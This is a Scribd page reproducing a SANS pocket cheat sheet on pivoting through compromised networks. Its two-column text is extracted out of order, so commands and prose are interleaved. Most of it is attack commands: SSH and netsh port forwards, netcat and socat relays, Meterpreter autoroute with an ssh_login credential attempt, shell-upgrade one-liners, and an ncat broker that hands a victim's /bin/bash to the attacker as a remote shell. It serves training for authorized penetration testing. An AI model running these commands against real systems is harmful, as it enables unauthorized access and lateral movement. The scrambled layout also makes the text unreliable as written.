Scribd Logo
Upload

Welcome to Scribd!

  • Pivot Cheat Sheet v1.0

    Uploaded by

    kylemcgowan
    8 views2 pages
    Pivoting Cheat Sheet

    Original Title

    pivot-cheat-sheet-v1.0

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    Pivoting Cheat Sheet

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    8 views2 pages

    Pivot Cheat Sheet v1.0

    Uploaded by

    kylemcgowan
    Pivoting Cheat Sheet

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 2

    netsh Port Proxy Upgrade Ugly Shells (pick one!

    ) Pivoting Cheat
    pivot c:\> netsh interface $ python -c 'import pty; Sheet
    portproxy add v4tov4 pty.spawn("/bin/bash")'
    POCKET REFERENCE GUIDE
    listenport=4000 $ ruby -e 'exec "/bin/sh"'
    SANS Institute
    listenaddress=0.0.0.0 $ /bin/sh -i or /bin/bash -i Version 1.0 24Jun20
    connectport=22 $ perl -e 'exec "/bin/sh";'
    connectaddress=victim.tgt Purpose
    attacker $ ssh Further Upgrade Ugly Shells Navigating a client/victim environment often
    victimadmin@pivot.tgt Things seem off? Sometimes this can return requires pivoting from target to target, and
    functionality like arrow keys in a shell. there are many ways to do so. This cheat
    Don’t Forget the Easy Stuff! victim $ <Ctrl>z sheet runs through various options for
    attacker $ stty raw -echo different environments and situations.
    SSH trail through Linux:
    attacker $ fg
    attacker $ ssh How to Use this Sheet
    victim $ reset
    pivotAdmin@pivot.tgt
    victim $ export SHELL=bash Find a method that may fit your situation. In
    pivot $ ssh
    victim $ export TERM=xterm- each, we model an attacker pivoting through
    victimAdmin@victim.tgt
    256color pivot to reach SSH on victim. Substitute
    victim $ stty rows 40 columns hosts and ports to fit your need.
    PowerShell sessions through Windows:
    80
    attacker PS C:\> Enter-
    PsSession –ComputerName Pay attention to prompts as they will identify
    Maintain State with Screen the host where the command should be run
    pivot.tgt
    victim $ session -S hackinz AND what type of prompt, i.e. Windows
    Or RDP session over Windows:
    cmd.exe (c:\>), PowerShell (PS), or Linux
    attacker c:\> mstsc.exe - Session fails
    ($ or #). The diagram in the center should
    /v:Pivot.tgt - Regain session, THEN:
    psexec.exe victim $ session -r hackinz help.
    Now, with command execution on pivot:
    Want more functionality than screen? Replace terms like victimAdmin and
    pivot C:\> ssh
    Check out tmux. victimPass with appropriate credentials
    victimadmin@victim.tgt
    Is your connection not stable enough for for the given system.
    No SSH available? How about PuTTY?
    ssh? mosh is more forgiving of spotty
    connections. On the back, there are some extra goodies -
    Note that even if all the hosts in the chain
    like how to upgrade an ugly Netcat shell to
    run Windows, you can’t typically PsSession
    Manage Many SSH Connections something that feels more like a real Bash
    twice because of how credentials are used.
    Run a search for pssession double session.
    Check out ProxyJump and.ssh/config to
    hop for more info. manage a wide array of ssh connections. Have fun, good luck, and pivot mercilessly!
    SSH Pivots Require an sshd Setting Situation Meterpreter Port Forward
    Set GatewayPorts yes in You need to access SSH on port 22 of victim, pivot Meterpreter > portfwd
    /etc/ssh/sshd_config, then: but you can’t go directly due to those add –l 4000 –p 22 –r
    pivot # systemctl restart sshd meddling firewalls. For simplicity, this sheet victim.tgt
    will generally be using ports 1337, 4000, and attacker $ ssh
    SSH Local Port Forward 22 on the Attacker, Pivot, and Victim victimadmin@pivot.tgt -P 4000
    machines.
    attacker $ ssh -fNL Metasploit/Meterpreter Autoroute
    1337:victim.tgt:22
    pivoter@pivot.tgt pivot Meterpreter > run
    attacker $ ssh victim.tgt post/multi/manage/autoroute
    SUBNET=pivotSubnet CMD=add
    victimadmin@localhost -P 1337
    pivot Meterpreter > background
    pivot msf > use
    SSH Remote Port Forward :22 scanner/ssh/ssh_login
    attacker $ ssh -fNR pivot msf > set RHOSTS
    4000:victim.tgt:22 victim.tgt
    pivoter@pivot.tgt pivot.tgt pivot msf > set USERNAME
    attacker $ ssh victimAdmin
    victimadmin@pivot.tgt -P 4000 pivot msf > set PASSWORD
    :4000 victimPass
    Proxychains pivot msf > run
    attacker $ ssh
    pivotadmin@pivot.tgt -D 9050 -
    attacker.tgt Socat Port Forward
    fN pivot $ socat TCP-
    attacker $ proxychains ssh LISTEN:4000,fork
    victimadmin@victim.tgt :1337 TCP:victim.tgt:22
    attacker $ ssh
    And check /etc/proxychains.conf Netcat Port Forward victimadmin@pivot.tgt -P 4000
    pivot $ cd /tmp && mknod
    Some SSH Command Line Options Ncat Connection Brokering
    backpipe p
    -f put ssh in the background after pivot $ nc -lvp 4000 Assumes code execution on victim
    connecting 0<backpipe | nc -v victim.tgt pivot$ ncat -vlp 4000 --broker
    -N don’t execute a command; just forward 22 1>backpipe victim$ ncat pivot.tgt 4000 -e
    some ports attacker $ ssh /bin/bash
    -P num use “num” port for ssh victimadmin@pivot.tgt -P 4000 attacker$ ncat pivot.tgt 4000

    You might also like